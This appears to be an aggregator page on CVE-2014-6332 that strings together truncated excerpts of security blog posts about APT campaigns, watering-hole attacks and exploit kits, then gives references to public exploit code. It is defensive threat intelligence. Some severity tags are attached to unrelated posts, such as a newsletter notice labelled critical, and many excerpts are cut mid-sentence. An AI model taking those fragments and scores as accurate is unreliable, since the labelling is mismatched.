- Vulnerable apps exploited by cybercriminals
- Online threats (Web-based attacks)
- Local threats
Authors
- Roman Unuchek
- Fedor Sinitsyn
- Denis Parinov
- Vladislav Stolyarov
## Q1 figures
According to KSN data, Kaspersky Lab solutions detected and repelled 479,528,279 malicious attacks from online resources located in 190 countries all over the world.
79,209,775 unique URLs were recognized as malicious by web antivirus components.
Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 288 thousand user computers.
Crypto ransomware attacks were blocked on 240,799 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 174,989,956 unique malicious and pot
Securelist
IT threat evolution Q1 2017. Statistics
blogs_securelist·2017-05-22
IT threat evolution Q1 2017. Statistics
Table of Contents
Q1 figures
Mobile threats
Q1 events
The rise of Trojan-Ransom.AndroidOS.Egat
Revamped ZTorg
Asacub awakens
Mobile threat statistics
Distribution of mobile malware by type
TOP 20 mobile malware programs
The geography of mobile threats
Mobile banking Trojans
Mobile Ransomware
Vulnerable apps exploited by cybercriminals
Online threats (Web-based attacks)
Online threats in the banking sector
Geography of attacks
The TOP 10 banking malware families
Ransomware Trojans
The number of users attacked by ransomware
The geography of attacks
Top 10 countries attacked by cryptors
Top 10 most widespread cryptor families
Top 10 countries where online resources are seeded with malware
Countries where users faced the greatest risk of online infection
Local threats
Zscaler
A Case Of Keitaro (featuring RIG And Nuclear) | Zscaler
blogs_zscaler·2016-02-29
A Case Of Keitaro (featuring RIG And Nuclear) | Zscaler
Zscaler
Bad Actors On GMHOST Alexander Mulgin Serginovic | Zscaler
blogs_zscaler·2016-01-12·CVSS 9.8
[CRITICAL] Bad Actors On GMHOST Alexander Mulgin Serginovic | Zscaler
Unit42
Attack on French Diplomat Linked to Operation Lotus Blossom
blogs_unit42·2015-12-18·CVSS 8.8
CVE-2014-6332 [HIGH] Attack on French Diplomat Linked to Operation Lotus Blossom
We observed a targeted attack in November directed at an individual working for the French Ministry of Foreign Affairs. The attack involved a spear-phishing email sent to a single French diplomat based in Taipei, Taiwan and contained an invitation to a Science and Technology support group event.
The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept (POC) code to install a Trojan called Emissary, which is related to the Operation Lotus Blossom campaign. The TTPs used in this attack also match those detailed in the paper. The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan.
We have created the Emissary tag
Unit42
Attack on French Diplomat Linked to Operation Lotus Blossom
blogs_unit42·2015-12-18·CVSS 8.8
[HIGH] Attack on French Diplomat Linked to Operation Lotus Blossom
## Attack on French Diplomat Linked to Operation Lotus Blossom
Robert Falcone
Jen Miller-Osborn
Published: December 18, 2015
Malware
Threat Research
Email
Emissary
Lotus Blossom
Spear Phishing
Unit42
UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
blogs_unit42·2015-07-27·CVSS 9.8
CVE-2015-3113 [CRITICAL] UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
A June 23 FireEye blog post titled “Operation Clandestine Wolf” discussed a cyber espionage group, known as APT3, that had been exploiting a zero-day vulnerability in Adobe Flash. Unit 42 also tracks the APT3 group using the name UPS, which is an intrusion set with Chinese origins that is known for having early access to zero-day vulnerabilities and delivering a backdoor called Pirpi.
The UPS group has exploited several zero-day vulnerabilities, most recently using the zero-days released in the Hacking Team breach that we discussed in our July 10 blog post, “APT Group UPS Targets US Government with Hacking Team Flash Exploit”. However, the most recent original zero-day released by this group is tracked by CVE-2015-3113, which has similarities to the once zero-day vulnerabilities CVE-2014-
Unit42
UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
blogs_unit42·2015-07-27·CVSS 9.8
CVE-2015-3113 [CRITICAL] UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
## UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
Robert Falcone
Richard Wartell
Published: July 27, 2015
Threat Research
Vulnerabilities
ActionScript
Adobe Flash
APT3
Internet Explorer
Operation Clandestine Wolf
Pirpi
Shellcode
Steganography
UPS
Zero-days
Unit42
Evilgrab Delivered by Watering Hole Attack on President of Myanmar’s Website
blogs_unit42·2015-06-11
Evilgrab Delivered by Watering Hole Attack on President of Myanmar’s Website
## Evilgrab Delivered by Watering Hole Attack on President of Myanmar’s Website
Robert Falcone
Published: June 11, 2015
Malware
Threat Research
Evilgrab
IFRAME
JavaScript
Myanmar
Trojan
Vidgrab
Watering Hole Attack
On May 12, 2015, Unit 42 observed an apparent watering hole attack, also known as a strategic website compromise (SWC), involving the President of Myanmar's website. Visiting the main page hosted at "www.president-office.gov[.]mm" triggered the malicious content, as the threat actors injected an inline frame (IFRAME) into a JavaScript file used by Drupal for the site's theme.
Unit 42 believes threat actors chose this website to set up a watering hole in order to target and gather information on individuals in Myanmar, individuals involved in political relations with the country and/or organizations doing business in Myanmar. Unit 42 has evidence to suggest the threat actors have had access to the website since November 2014 if not earlier.
Shortly after we reported the infection to the o
Unit42
Don’t Miss A Single Threat Intelligence Update from Unit 42!
blogs_unit42·2014-12-29·CVSS 10.0
[CRITICAL] Don’t Miss A Single Threat Intelligence Update from Unit 42!
## Don’t Miss A Single Threat Intelligence Update from Unit 42!
Chad Berndtson
Published: December 29, 2014
Malware
Threat Research
419 Evolution
CoolReaper
Threat intelligence
Threat Landscape Review
Whitepaper
WireLurker
Unit 42 is the Palo Alto Networks threat intelligence team. Made up of accomplished cybersecurity researchers and industry experts, Unit 42 gathers, researches, analyzes, and provides insights into the latest cyber threats, then shares them with Palo Alto Networks customers, partners and the broader community to better protect enterprise, service provider, and government computing environments.
You can now have up-to-the-minute threat intelligence updates from Unit 42 delivered right to your inbox, as they’re posted. Click here to subscribe.
Regular research analysis is posted to the Unit 42 threat intelligence blog. Unit 42 also publishes whitepapers examining, in detail, threats to mobile device ecosystems, APTs, malware attack patterns and other subjects crucial to any security practi
Talos
Ancient Mac Site Harbors Botnet that Exploits IE Vulnerability
blogs_talos·2014-12-15·CVSS 8.8
CVE-2014-6332 [HIGH] Ancient Mac Site Harbors Botnet that Exploits IE Vulnerability
This post was authored by Alex Chiu and Shaun Hurley.
Last month, Microsoft released a security bulletin to patch CVE-2014-6332, a vulnerability within Windows Object Linking and Embedding (OLE) that could result in remote code execution if a user views a maliciously crafted web page with Microsoft Internet Explorer. Since then, there have been several documented examples of attackers leveraging this vulnerability and attempting to compromise users. On November 26th, Talos began observing and blocking an attack disguised as a hidden iframe on a compromised domain to leverage this vulnerability and compromise Internet Explorer users.
### A High Level Look at the Attack
One attack vector that has been highly effective in the past is compromising and leveraging a vulnerable site to direct us
Zscaler
Defaced Websites Leading To Dokta Chef Exploit Kit | Zscaler
blogs_zscaler·2014-11-26·CVSS 8.8
[HIGH] Defaced Websites Leading To Dokta Chef Exploit Kit | Zscaler
Unit42
Addressing CVE-2014-6332 SWF Exploit
blogs_unit42·2014-11-26·CVSS 8.8
CVE-2014-6332 [HIGH] Addressing CVE-2014-6332 SWF Exploit
## Addressing CVE-2014-6332 SWF Exploit
Palo Alto Networks
Published: November 26, 2014
Threat Research
Vulnerabilities
EMET
Endpoint
Internet Explorer
Shellcode
Continuing a recent trend in which Internet Explorer vulnerabilities are exploited using Flash, samples of an SWF purportedly used in conjunction with CVE-2014-6332 have appeared in several places. The most famous examples of this trend are the exploits for CVE-2014-0322 and CVE-2014-1776.
We have yet to encounter the SWF sample with its original exploit attached, but by looking at the SWF, it is clear that it is constructed to function with several forms of memory corruption, making the vulnerability itself less interesting. That is a great example of why our Advanced Endpoint Protection approach, which focuses on the core techniques used in attacks, works well. It will prevent uses of this SWF framework, regardless of the vulnerability it is used with.
The interesting part in this expl
Talos
Microsoft Update Tuesday November 2014: Fixes for 3 0-day Vulnerabilities
blogs_talos·2014-11-11·CVSS 7.8
[HIGH] Microsoft Update Tuesday November 2014: Fixes for 3 0-day Vulnerabilities
## Microsoft Update Tuesday November 2014: Fixes for 3 0-day Vulnerabilities
This month Microsoft is releasing 14 security bulletins. Originally they had planned to release 16, but due to issues that emerged in late testing, two bulletins that were announced in the Advance Security Notification, MS14-068 and MS14-075, have been postponed. Of the 14 bulletins, four are considered critical, eight are important, while two are moderate. They cover a total of 33 CVEs.
We’ll start off with the four critical bulletins, for a total of 21 CVEs that can result in remote code execution:
Our first bulletin of the month is MS14-064 and fixes two vulnerabilities (CVE-2014-6332, CVE-2014-6352) in Windows Object Linking and Embedding (OLE) that could allow remote code execution. Both issues are seeing attack in the wild and can be considered 0-days. CVE-2014-6352 is a vulnerabil
Recorded Future
Tracking Moving Targets: Exploit Kits and CVEs
blogs_recorded_future
Tracking Moving Targets: Exploit Kits and CVEs
# Tracking Moving Targets: Exploit Kits and CVEs
One year ago a notorious programmer Paunch, who coded the Blackhole exploit kit, was arrested and charged for the distribution and sale of his wares. Blackhole was an epic Russian exploit kit, rented and used by thousands for their successful campaigns against a range of targets.
Since Paunch’s arrest, the exploit kit threat landscape has changed significantly as malicious actors have sought out new tool kits. Recorded Future undertook the task of analyzing over 600,000 unique web sources to identify the most prevalent exploit kits, what CVEs they commonly leverage, and what the most vulnerable products are.
To get started, let’s craft a simple query looking for mentions of any exploit kit over the last six months.
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
arXiv
Technical Aspects of Cyber Kill Chain
arxiv_fulltext·2016-06-10
Tarun Yadav
Scientist, Defence Research and Organisation, INDIA: [email protected]
Rao Arvind Mallari
Scientist, Defence Research and Organisation, INDIA: [email protected]
## Abstract
Recent trends in targeted cyber-attacks have increased the interest of research in the field of cyber security. Such attacks have massive disruptive effects on organizations, enterprises and governments. The cyber kill chain is a model to describe cyber-attacks so as to develop incident response and analysis capabilities. The cyber kill chain, in simple terms, is an attack chain: the path that an intruder takes to penetrate information systems over time to execute an attack on the target. This paper broadly categorises the methodologies, techniques and tools involv
References
- http://packetstormsecurity.com/files/134053/Avant-Browser-Lite-Ultimate-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/134061/The-World-Browser-3.0-Final-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/134062/HTML-Compiler-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/134064/Microsoft-Compiled-HTML-Help-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/134079/Winamp-Bento-Browser-Remote-Code-Execution.html
- http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows
- http://www.kb.cert.org/vuls/id/158647
- http://www.securityfocus.com/bid/70952
- http://www.securitytracker.com/id/1031184
- http://www.us-cert.gov/ncas/alerts/TA14-318B
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-064
- https://forsec.nl/wp-content/uploads/2014/11/ms14_064_ie_olerce.rb_.txt
- https://www.exploit-db.com/exploits/37668/
- https://www.exploit-db.com/exploits/37800/
- https://www.exploit-db.com/exploits/38500/
- https://www.exploit-db.com/exploits/38512/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2014-6332
Published: 2014-11-11
Added to CISA KEV: 2022-03-25
Exploited in the wild